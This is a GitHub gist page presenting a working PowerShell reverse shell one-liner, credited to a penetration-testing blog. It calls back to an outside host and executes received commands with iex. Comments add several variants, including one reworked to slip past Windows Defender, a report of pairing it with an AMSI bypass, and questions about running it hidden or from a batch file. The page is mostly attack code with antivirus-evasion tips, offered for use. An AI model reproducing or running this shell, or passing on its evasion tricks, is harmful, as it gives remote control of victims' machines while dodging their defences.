Skip to content

Instantly share code, notes, and snippets.

@egre55

egre55/powershell_reverse_shell.ps1

Last active September 6, 2023 13:31
Star You must be signed in to star a gist
Embed
What would you like to do?
Learn more about clone URLs
Download ZIP
powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok
Raw
powershell_reverse_shell.ps1
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
@munteanulc
Copy link

munteanulc commented Jan 11, 2021
edited

The Windows Defender action is triggerd by the "(pwd).Path" call in the code. Try running the following:
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.100',4443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PSReverseShell# ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}$client.Close();"

@cnibbler
Copy link

Hi, Kindly check my fork.

Just a small change to the way commands are run to ensure any non-stdout text is sent back. (except for confirmation prompts).

Without this, due to the way in which the output of a command run by Invoke-Expression is handled, stderr output never gets sent back even with '2>&1' specified in your current format.

Thanks,

@pentestblogin
Copy link

[vry nice )

@pretech86
Copy link

i tried to run it silently by -WindowsStyle Hidden -NoLog but it not working , how can i run it silently

@CalfCrusher
Copy link

The Windows Defender action is triggerd by the "(pwd).Path" call in the code. Try running the following:
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.100',4443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PSReverseShell# ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}$client.Close();"

This actually still works and doesn't trigger anything

@Developer-Mike
Copy link

Hi, can someone explain how this exactly works? Why is (pwd).Path triggers the antivirus. And is this reverse shell only available until a restart of the victim's pc? I didn't found any explanation online. Thanks in advance.

@rikuru-to865
Copy link

good job!
It detected AMSI. but I used amsi bypass script before this script running.so this script runs successfully!

@mappl3
Copy link

mappl3 commented Feb 1, 2022

Looks like the shell did not return stderr, is it possible to return stderr as well?

@egre55
Copy link
Author

egre55 commented Feb 1, 2022
edited

hey @mappl3, feel free to add this in your fork and i'll update it ;) . you can also append 2>&1 to the end of a command to get stderr

@Veids
Copy link

Veids commented Oct 4, 2022

Got stderr working with this modification:
$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
And if you want to catch some errors:
$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);try { $sendback = (iex ". { $data } 2>&1" | Out-String ); } catch { $sendback = "$_`n"}; $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

@egre55
Copy link
Author

egre55 commented Oct 4, 2022

that's the one-liner updated with your addition for stderr. thanks for your contribution @Veids!

@ChillVibesMushroom
Copy link

The Windows Defender action is triggerd by the "(pwd).Path" call in the code. Try running the following:
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.100',4443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PSReverseShell# ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}$client.Close();"

This actually still works and doesn't trigger anything

How would I run this from a bat file and what book do you recommend to learn powershell scripting on this level

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment